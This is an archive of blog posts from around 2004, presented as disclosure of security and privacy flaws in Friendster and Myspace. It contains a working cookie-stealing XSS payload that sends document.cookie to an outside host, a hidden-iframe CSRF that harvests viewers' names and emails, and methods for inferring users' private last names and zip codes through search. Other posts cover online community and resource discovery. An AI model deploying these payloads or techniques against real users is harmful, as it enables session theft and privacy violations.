10.02.04

Hacking Social Networks part II (Don't search private data)

This installment of Hacking Social Networks is about search and private data. The point we want to make is that public searches should never be allowed to return results based on private data. To be clear, we do not mean results that explicitly include private data, but results that, while only containing public data, are constrained by private data. Let's take three pieces of private data on Friendster: last name, zip code, and email address, and consider how they can be abused or discovered.

Last names in many social networks, including Friendster, are considered private data. To find the last name of someone on Friendster we will use the user search feature. User search lets you search for people by first and last name. The user's profile reveals to you their first name and their user id (in the URL). To abuse the user search, enter the user's first name, guess a last name and see if any of the returned users match the user we are interested in. This approach is reasonable because the distribution of last names is not even; it is in fact so uneven that one out of every one hundred people in the US has the last name Smith. The US Census Bureau provides us with the data. From this we see that after trying only twenty-eight last names we have a ten percent chance of having guessed the user's last name. As we go down the list the probability for each new name decreases, so we have to try more and more names to increase our chance of getting a match. The 115th name gets us to twenty percent, the 315th to thirty percent, the 771st to forty percent, and so on. Clearly, this is too much to do by hand but not too much for a program to perform. Most last names can be discovered from Friendster profiles.

The second private data we consider is zip codes. Like last names, zip codes are not made available in profiles but are used as part of the Gallery search criteria. To perform this attack, first retrieve the user id and location from a user's profile. Then, get all the zip codes for their location. For each zip code, change your location to that zip code, and perform a Gallery search for the user with the distance set to one mile*. Note which searches returned the user in question. Once all searches have been performed, you can deduce which zip code the user actually resides in using either a zip code map, which can be found in your phone book, or by looking at the distances between the zip codes.

*To search the Gallery with a distance of one mile you must save the page and edit the distance menu HTML to include 1 as an option.

Email addresses are the third data we discuss. There is no easy mapping from user id to email address. Instead we do the opposite: find someone's Friendster account by email address. We have written about this once before, providing an example bookmarklet for finding people on Friendster. Besides the bookmarklet, we also have a program which generates reports of Friendster profiles by monitoring local network traffic. The privacy issue is: your email address, which most people use as if it were pseudonymous, is no longer pseudonymous. Instead it is tightly coupled with your identity on any social network services you use.

Someone can post a personal ad on craigslist and check the picture and details of all the respondents before writing back. Suddenly, a total stranger knows what you look like, who your friends are, your gender and sexual orientation, what movies you like and how you spend your free time. This increase in transparency isn't evident when you sign up to these services.

Posted by moore at 13:11 | Comments (6)

05.02.04

Hacking Friendster, Part I

EDITOR'S NOTE: I have posted these hacks in the hopes of publicizing security holes and forcing the networks to close them. Please do not send me email, myspace messages, or friendster messages asking me to spend my free time helping you duplicate this hack. Both Myspace and Friendster have modified their sites enough so that these hacks no longer work. In addition, this article contained far more than enough information to duplicate these hacks (when they worked), and still contains enough information to build similar hacks today. If you do not understand how to make similar hacks, consider doing your own research. If you want my help learning CGI and DHTML/JavaScript, I am available as an independent contractor and instructor at the rate of $60/hr. If you contact me asking for assistance in stealing other people's personal information I will forward your email to the relevant social network's abuse contact person, and recommend that they deactivate your account.

This is the first in a series of articles that expose security flaws in social networks. The two hacks described here are cross-site scripting attacks.

My Friendster profile has a link to my homepage. And my homepage has an embedded iframe in it, which uses a GET query string to call the "Forward this profile to another user" function of Friendster.

In other words, by loading my webpage, your browser loads a page which sends an email to me, via the Friendster service. This email contains: your first & last name, the email you used to sign up to Friendster, your Friendster user-id, and a link which I can use to sign up to Friendster and automatically become your friend. There is no record of this anywhere on your Friendster account; it is totally invisible.

Here's the code in my homepage:

<iframe src="http://www.friendster.com/forward?id=229243&email=MYEMAIL&subject=friendsterview&message=friendsterview" width="1" height="1"></iframe>

Here's a sample of what gets sent in email:

Matt Chisholm has forwarded a user's profile to you from Matt's
personal network on Friendster.

Matt is 27 in San Francisco, CA.

If you are a Friendster member, you can view Matt's profile by
clicking below:
http://www.friendster.com/user.jsp?id=229243

If you are not a Friendster member yet, you can join Friendster by
clicking below:
http://www.friendster.com/join.jsp?inviteuser=229243

Friendster is an online community that connects people through networks
of friends for dating or making new friends.

Once you join Friendster, you will be automatically connected to your
friend Matt, and all of Matt's friends.

Friendster is inadvertently impervious to this attack, however, since you are often logged out within moments of logging in, and when you do successfully stay logged in, the site is either too slow or by that point my profile is no longer in your "Personal Network."
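The forward trick above works because the browser attaches the viewer's Friendster cookies to any GET request a third-party page triggers. The usual server-side fix, shown here as an added example that is not Friendster's code and that the post itself does not describe, is to refuse GET for state-changing actions and to require a per-session token that only a page on the same origin could have read. The endpoint name, parameters and key are assumptions.

```python
import hashlib
import hmac
import secrets

# Constructed key for the example; a real deployment loads it from configuration.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id):
    """Per-session token derived from the session id with a server-side secret.

    A page on another site cannot compute it for its visitor, so an <iframe> or
    <img> pointing at the forward URL cannot supply a valid one."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_forward(method, params, session_id):
    """Guard for a 'forward this profile' style endpoint (hypothetical handler).

    Returns (http_status, reason). Mail is only sent on the user's behalf for a
    POST whose token matches the caller's own session."""
    if method != "POST":
        return 405, "state-changing action must not be reachable by GET"
    token = params.get("csrf_token", "")
    if not hmac.compare_digest(token, csrf_token(session_id)):
        return 403, "missing or foreign csrf token"
    return 200, f"forwarded profile {params.get('id')} to {params.get('email')}"
```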

The security holes on Myspace, while they have gotten better, are much deeper. For a long time, they allowed free HTML entry in all fields, and they still allow some HTML entry.

For a long time, you could embed an image in your Myspace profile which called another Myspace function, so you effectively could cause a user viewing your profile (or anything with text that you created) to execute any Myspace function with your own parameters.

In these heady days of Myspace hackability, Jonathan & I created some interesting myspace hacks, which he will describe in a later post.

At some point, someone at Myspace wised up, and stopped allowing HTTP GET requests, and then they blacklisted the <iframe> and <script> tags, added JavaScript to their pages to prevent them being loaded in frames, and at least at one point, someone removed a hack from my profile. (Plus for some reason they don't allow # characters in text.)

Myspace hasn't completely closed off their security holes, however. The numerous javascript event handlers are still allowed, and so are image tags, so you can embed a 1x1 image, and execute arbitrary javascript on image load.

My javascript of choice attempts to log who is viewing my profile, by sending the content of the launchIC function, which contains the viewer's UID, and all of their browser cookies, to php on my site which mails it to me.

<img src="images/new_logo_test11.gif" width="10" id="h44" height="10" onload="document.getElementById('h44').src= 'http://www.theory.org/~matt/myspace.php?u='+ escape(document.cookie)+launchIC;">

The email I get looks like this (you can see my userid down there being assigned to memberID, and the cookie content varies greatly depending on what the user has been doing):

myspace view from
IMREQUESTCHECK={ts '2004-02-05 00:43:03'}
MYUSERINFO=M)NOMP_;R2P6%P]>35)6OF/N$5%:C4MIYK,N7@Y'!2\N
6R ??S\/&1/[**0K:R_DIS10DSZOKX@ !
function launchIC(destinationMemberID) {    memberID = \"104189\"
   PrivoxyWindowOpen(\"index.cfm?fuseaction=messanger

As before, there is no record anywhere that the user can see.

And now for the question on everyone's mind. What is the upshot of all of this hacking? Who's viewing my profiles and checking out my webpage? The answers are actually quite depressing. The Friendster hack catches my friends more often than anyone else. And the people who view my Myspace profile fall into two categories: gay guys in San Francisco, and eighteen year-olds in the suburbs. I've even mailed girls on Myspace who have responded apparently without looking at my profile at all.

I leave the ramifications of this kind of insecurity in the hands of a malicious user as an exercise to the reader.

Update 10-02-2004: I should think it's obvious from this article that if you load up either URL and are logged in to Myspace or Friendster, I will get an email with your userid. This is how I know that the ubiquitous Myspace admin, Tom (userid #6221), just viewed my profile at about 8:50 pm PST tonight. I can only assume (since absolutely no one has viewed my profile there for months prior to posting this article) that this viewing event was in response to reading this article. Yay for him! I could tell you what zip code he lives in and what parameters he's been using to browse the Myspace network, but I'm a nice guy and I won't. Hopefully Myspace will close up their free-HTML security holes and not delete my account for what I'm sure is a TOS violation under some interpretations.

Update 15-02-2004: Some people have asserted that posting this kind of information on my blog is "not cool." These vulnerabilities in free HTML entry are well known, well documented vulnerabilities. I haven't discovered a new thing here; any nimrod with a DHTML manual can do this. If you run a website where people can enter free HTML, you should protect yourself and your users from these vulnerabilities. With a little bit of effort, a social engineering virus like MYDOOM could be spreading on Myspace, bringing the myspace servers to their knees and frustrating users into quitting the service.

If you are interested, I am part of a consulting company which will do security consulting for sites like these.

Update II: 15-02-2004: Some enterprising Myspace denizens have been copying and pasting my Myspace hack into their profiles. If you do this, the hack will just mail all of the information it collects to me; you will gain nothing, and it clutters up my inbox. If you want to duplicate this hack you'll have to set up a mailing script on your own site.

Update III: 26-02-2004: Jonathan has posted Hacking Social Networks Part II: Don't search private data. Check back for the third installment soon.

Posted by matt at 01:20 | Comments (3)

02.10.03

The 'Net Builds Itself

With the proliferation of community web spaces such as wikis, blogs, forums, and commenting systems comes worries of vandalism. A recent article by Dan Gillmor, Remembering the People Who Give Back to the Net, and All of Us, discusses the vandalism of his WordPirates site. The vandals showed Dan the "downside of the Net" while the mass of people who helped restore the site to its intended state showed Dan the "profound upside".

One of the most interesting things about open sites is that they are forced to become what the net wants them to be. Who's good and who's bad (vandals vs maintainers) is really a popularity contest. Wikipedia persists because there are a lot of people who like to work and build Wikipedia. The BitTorrentFAQ wiki node often appears vandalized because there isn't a strong community behind the wiki (and possibly because people don't know how to easily fix it). Friendster thrives with fakesters because there is a strong community of fakesters (even a manifesto) and people who want to connect to fakesters.

The net builds what it wants. If there is a stronger force that doesn't want a site the way it is and the force works to take the site down, it will go down. Is this wrong? I don't think so. I think anyone should be able to have an open site but they will have to build community if they want it to be successful and protected. Foreign policy sans WOMD?

Posted by brainsik at 05:17 | Comments (2)

23.09.03

The Britney Twisty Puzzle Contention

There are two problems in contention for resource discovery in social networks. One is that there are cases where you want to create partitions in the network to allow for diversity of ideas. The second is that you want to make it easy to find esoteric subjects. The first I will describe in terms of Britney Spears fans and fetishists: the fans and fetishists problem. The second I will describe in terms of twisty puzzles: the esoteric resource discovery problem.

The Fans and Fetishists problem is the desire to create partitions of the social network so that diversity can exist. Take for example two groups of Britney Spears devotees: fans and fetishists. The fans are mostly young people who actually enjoy the singer's music. These fans want a place to discuss Britney and engage in other such wholesome, fan-related activity. The fetishists on the other hand are mostly adults who have impure thoughts about the pop icon. They instead engage in discussion and activities not appropriate for the majority of the fans. The goal is to allow both to exist, guard against the fans accidentally stumbling into a fetishist discussion group, and (probably) increase the difficulty for the fetishists to find a fans group.

In meat space, the separation between fetishists and fans is largely accomplished by performing resource discovery in the social network. The fans are unlikely to accidentally end up hanging out with a bunch of fetishists because they are not connected to the adult network that the fetishists exist in. Similarly, adolescent fan social networks are inaccessible to the fetishists; they would find it difficult to know when and where the fans meet to trade gossip.

The twisty puzzle problem is much simpler to describe. Simply, avid twisty puzzle fans are a dispersed and disconnected group which would like to have a common discussion forum. A single forum is desired because there are only a small number of true twisty junkies and they are physically and socially distant. This type of situation is not solved well in meat space but is handled fine on the internet. A short session with Google will find you the twisty fan sites and mailing lists.

The contention between these two problems is the ease of resource discovery. It should be easy for twisty and hard for Britney. For the Britney problem, we can borrow from meat space and allow a Britney group to be discovered only by reference from someone in your online social network. For the twisty problem, one common solution is to have a searchable directory of interest groups. One could provide an option in group creation as to whether or not it should be listed in the directory. My issue with this is that I don't trust users to make the right choice when deciding to have their group listed or not. For me, the challenge is to find an approach that is "natural", requiring the user to make no choices about how resource discovery works.

A note about central directories.

There is a general problem with central directories. Over time, popular topics tend to have a poor signal-to-noise ratio. This can be seen in what happened to Usenet news as the internet expanded. It seems that, largely, the answer people had to this change was to create mailing lists and move off Usenet. Since there was no central directory of mailing lists, they are harder to find and there are often multiple ones per topic. I think both these factors help to increase the S/N ratio for mailing lists over Usenet, but of course, again, at the cost of making it harder for esoteric groups to form.

Posted by moore at 09:31

Creepster

I have been thinking about different creepy ways to use Friendster lately. This is my first hack: It is a bookmarklet that will search Friendster for the currently selected text as an email address. Basically, what that means is you select an email address on a web page, click, and see whether there is a Friendster profile using that address.

Friendster email lookup (bookmarklet)

I have only tried it under Mozilla, but it should work in IE as well, and it does not work when there are frames. As I probably will not use this much myself, it is unlikely that I will fix the frame issue. If you want to use it, drag the link to your shortcut bar.

Posted by moore at 09:22